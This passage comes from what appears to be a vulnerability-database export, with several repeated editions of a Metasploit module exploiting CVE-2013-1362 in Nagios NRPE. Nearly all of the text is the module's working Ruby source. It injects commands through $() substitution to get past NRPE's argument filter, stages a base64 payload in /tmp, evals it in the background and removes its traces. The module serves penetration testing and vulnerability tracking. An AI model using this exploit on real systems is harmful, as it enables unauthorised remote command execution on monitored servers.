When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n 
end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless 
datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2017-11-01T09:38:44", "differentElements": ["modified", "published"], "edition": 8}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. 
When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2017-11-01T13:38:45", "history": [], "viewCount": 16, "enchantments": {}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. 
When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n 
end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless 
datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2017-11-01T13:38:45", "differentElements": ["modified", "published"], "edition": 9}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. 
When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2017-11-02T19:40:23", "history": [], "viewCount": 16, "enchantments": {}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. 
When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n 
end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless 
datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2017-11-02T19:40:23", "differentElements": ["modified", "published"], "edition": 10}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. 
When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2017-11-02T21:37:09", "history": [], "viewCount": 16, "enchantments": {}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. 
When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n 
end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless 
datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2017-11-02T21:37:09", "differentElements": ["modified", "published"], "edition": 11}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. 
When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2017-11-09T13:37:56", "history": [], "viewCount": 16, "enchantments": {}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. 
When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n 
end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote 